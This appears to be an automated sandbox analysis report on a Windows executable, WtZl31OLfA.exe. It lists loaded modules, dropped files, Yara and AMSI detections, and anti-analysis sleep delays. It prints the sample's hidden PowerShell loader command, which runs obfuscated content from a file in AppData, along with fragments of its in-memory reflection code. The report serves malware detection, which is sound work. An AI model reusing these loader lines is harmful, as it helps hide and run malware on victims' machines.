            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: WtZl31OLfA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %eqm.Core.pdb source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbl source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2296384908.00000000088BF000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.2297304332.000000000A291000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Nowhen $Naalene $Vindspejl), (Nipse @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Volosts0 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Dreegh = (
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lilina)), $destrueres).DefineDynamicModule($Tylion, $false).DefineType($Bevaege, $Iterative105, [System.MulticastDelegate])$Intermedia
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0794E1A6 push esi; iretd 1_2_0794E1A7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exeJump to dropped file
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeFile created: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8396Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1204Jump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652Thread sleep count: 2350 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652Thread sleep time: -7050000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652Thread sleep count: 7594 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652Thread sleep time: -22782000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\WtZl31OLfA.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2281239821.00000000058F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\eq
            Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
